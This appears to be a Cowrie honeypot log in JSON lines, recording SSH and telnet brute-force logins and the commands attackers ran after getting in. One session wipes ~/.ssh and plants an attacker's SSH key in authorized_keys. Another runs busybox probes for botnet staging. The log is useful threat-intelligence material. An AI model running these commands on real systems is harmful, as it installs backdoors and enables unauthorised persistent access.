{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:59:18.481310Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:59:18.576701Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.login.success","username":"root","password":"ok","message":"login attempt [root/ok] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:59:18.985541Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:59:19.233575Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:59:19.234262Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:59:19.235105Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:19.389380Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:59:19.601533Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:59:19.602261Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:59:19.675910Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:19.676847Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":40358,"dst_ip":"1.2.3.4","dst_port":22,"session":"0430de1333e6","protocol":"ssh","message":"New connection: 93.113.63.124:40358 (1.2.3.4:22) [session: 0430de1333e6]","sensor":"my-vps","timestamp":"2025-09-08T23:59:19.747359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:59:19.748372Z","src_ip":"93.113.63.124","session":"0430de1333e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:59:19.819546Z","src_ip":"93.113.63.124","session":"0430de1333e6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:59:20.152838Z","src_ip":"93.113.63.124","session":"0430de1333e6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:21.227194Z","src_ip":"93.113.63.124","session":"0430de1333e6"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":40368,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8e81581b41e","protocol":"ssh","message":"New connection: 93.113.63.124:40368 (1.2.3.4:22) [session: e8e81581b41e]","sensor":"my-vps","timestamp":"2025-09-08T23:59:21.297146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:59:21.297780Z","src_ip":"93.113.63.124","session":"e8e81581b41e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:59:21.369310Z","src_ip":"93.113.63.124","session":"e8e81581b41e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:59:21.727229Z","src_ip":"93.113.63.124","session":"e8e81581b41e"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:21.800079Z","src_ip":"93.113.63.124","session":"627cf6593638"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:21.801498Z","src_ip":"93.113.63.124","session":"e8e81581b41e"}
{"eventid":"cowrie.session.closed","duration":13.949739217758179,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:23.361644Z","src_ip":"139.101.141.223","session":"7d7b63f6fdee"}
{"eventid":"cowrie.session.connect","src_ip":"46.150.68.172","src_port":4046,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3882650f118","protocol":"telnet","message":"New connection: 46.150.68.172:4046 (1.2.3.4:23) [session: e3882650f118]","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.186742Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1988","message":"login attempt [admin/1988] failed","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.375336Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.login.success","username":"root","password":"oelinux1234","message":"login attempt [root/oelinux1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.563218Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:59:33.585176Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.635169Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.637839Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.639151Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.640297Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.640915Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.641602Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox HBLEA","message":"CMD: cat /proc/mounts; /bin/busybox HBLEA","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.692504Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HBLEA","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HBLEA","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.746518Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox HBLEA","message":"CMD: tftp; wget; /bin/busybox HBLEA","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.799309Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.853898Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.856059Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"/bin/busybox HBLEA","message":"CMD: /bin/busybox HBLEA","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.905959Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.907876Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.909343Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.910082Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/020e7867e351a51c9b86b0960a8c57079424b3c8fad04d4901aa79a1a37035b9","size":3550,"shasum":"020e7867e351a51c9b86b0960a8c57079424b3c8fad04d4901aa79a1a37035b9","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/020e7867e351a51c9b86b0960a8c57079424b3c8fad04d4901aa79a1a37035b9 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.911522Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.session.closed","duration":0.7296586036682129,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:33.916303Z","src_ip":"46.150.68.172","session":"e3882650f118"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":58170,"dst_ip":"1.2.3.4","dst_port":22,"session":"f67a3ccd6a05","protocol":"ssh","message":"New connection: 46.101.8.63:58170 (1.2.3.4:22) [session: f67a3ccd6a05]","sensor":"my-vps","timestamp":"2025-09-08T23:59:39.695265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:59:39.696161Z","src_ip":"46.101.8.63","session":"f67a3ccd6a05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:59:39.717633Z","src_ip":"46.101.8.63","session":"f67a3ccd6a05"}
{"eventid":"cowrie.login.failed","username":"fish","password":"qwerty","message":"login attempt [fish/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T23:59:39.843808Z","src_ip":"46.101.8.63","session":"f67a3ccd6a05"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:40.868037Z","src_ip":"46.101.8.63","session":"f67a3ccd6a05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55630,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc771ca8b011","protocol":"telnet","message":"New connection: 212.227.125.160:55630 (1.2.3.4:23) [session: fc771ca8b011]","sensor":"my-vps","timestamp":"2025-09-08T23:59:50.411210Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:59:50.494193Z","src_ip":"212.227.125.160","session":"fc771ca8b011"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:59:50.558704Z","src_ip":"212.227.125.160","session":"fc771ca8b011"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T23:59:50.560355Z","src_ip":"212.227.125.160","session":"fc771ca8b011"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T23:59:50.561383Z","src_ip":"212.227.125.160","session":"fc771ca8b011"}